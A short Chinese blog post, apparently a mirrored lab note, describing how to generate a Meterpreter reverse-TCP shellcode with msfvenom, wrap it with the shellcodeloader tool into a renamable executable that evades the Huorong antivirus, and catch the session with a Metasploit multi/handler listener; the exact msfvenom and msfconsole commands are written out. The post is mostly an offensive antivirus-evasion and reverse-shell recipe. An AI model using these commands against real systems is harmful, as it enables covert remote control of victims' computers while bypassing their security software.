zoukankan      html  css  js  c++  java
  • Shellcodeloader免杀过火绒

    题记

            今天脑子里面蹦出来个想法,免杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究免杀火绒吧。

    环境

            Kali:192.168.0.119 win10:192.168.0.200

            工具地址:https://github.com/knownsec/shellcodeloader

    步骤

    1、在kali生成3.bin木马。

            msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin

    2、把木马移到工具上做免杀。

    生成loder.exe软件,可随意改名,运行就能上线。

    3、kali开启监听。

            msfconsole

            use exploit/multi/handler

            set payload windows/x64/meterpreter/reverse_tcp

            set lhost 192.168.0.119

            exploit

            然后运行exe

            上线

    4、火绒检测

            软件运行后检测。

  • 相关阅读:
    自己写库—构建库函数雏形
    暑假第二周计划
    初学Oracle
    暑假第一周计划
    读书笔记六
    读书笔记五
    读书笔记四
    读书笔记三
    读书笔记
    系统目标文档
  • 原文地址:https://www.cnblogs.com/sunny11/p/14105624.html
Copyright © 2011-2022 走看看